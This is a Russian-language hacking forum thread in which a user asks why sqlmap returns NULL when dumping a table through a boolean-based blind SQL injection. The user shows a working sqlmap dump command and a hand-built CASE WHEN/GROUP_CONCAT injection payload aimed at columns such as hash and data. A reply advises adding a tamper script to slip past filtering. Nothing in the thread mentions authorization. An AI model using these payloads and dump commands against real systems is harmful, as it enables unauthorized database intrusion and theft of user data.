• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

SQLmap возвращает NULL

winitu

Member
03.08.2023
9
0
BIT
27
Привет, есть инъекция которую раскрутил через burp suite через boolean-based blind. Знаю таблицу и столбцы в ней, хотел использовать sqlmap для дампа данных, но возвращаются все строки с параметрами NULL:
1692639992027.png

Команда в мапе: --url ' ' --data 'customer=-1 OR 2&submit=Senden' --method POST -D base -T table -C id,hash,data,psv,name,valid,completed,date --batch --random-agent --dump
А вот данные запроса в burp'e: customer=-1 OR /*!case when ((SELECT SUBSTRING(GROUP_CONCAT(id,hash,data,psv,name,valid,completed,date),1,1) FROM base.table) = '1') then 5 else 0 end
*Так посимвольно я и узнал, что таблица не пуста, но почему возвращается NULL непонятно...

Помогите советом, что делаю не так((
 

Exited3n

Red Team
10.05.2022
712
255
BIT
605
Привет, есть инъекция которую раскрутил через burp suite через boolean-based blind. Знаю таблицу и столбцы в ней, хотел использовать sqlmap для дампа данных, но возвращаются все строки с параметрами NULL:
Посмотреть вложение 71135
Команда в мапе: --url ' ' --data 'customer=-1 OR 2&submit=Senden' --method POST -D base -T table -C id,hash,data,psv,name,valid,completed,date --batch --random-agent --dump
А вот данные запроса в burp'e: customer=-1 OR /*!case when ((SELECT SUBSTRING(GROUP_CONCAT(id,hash,data,psv,name,valid,completed,date),1,1) FROM base.table) = '1') then 5 else 0 end
*Так посимвольно я и узнал, что таблица не пуста, но почему возвращается NULL непонятно...

Помогите советом, что делаю не так((
Добавь --tamper=space2comment
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!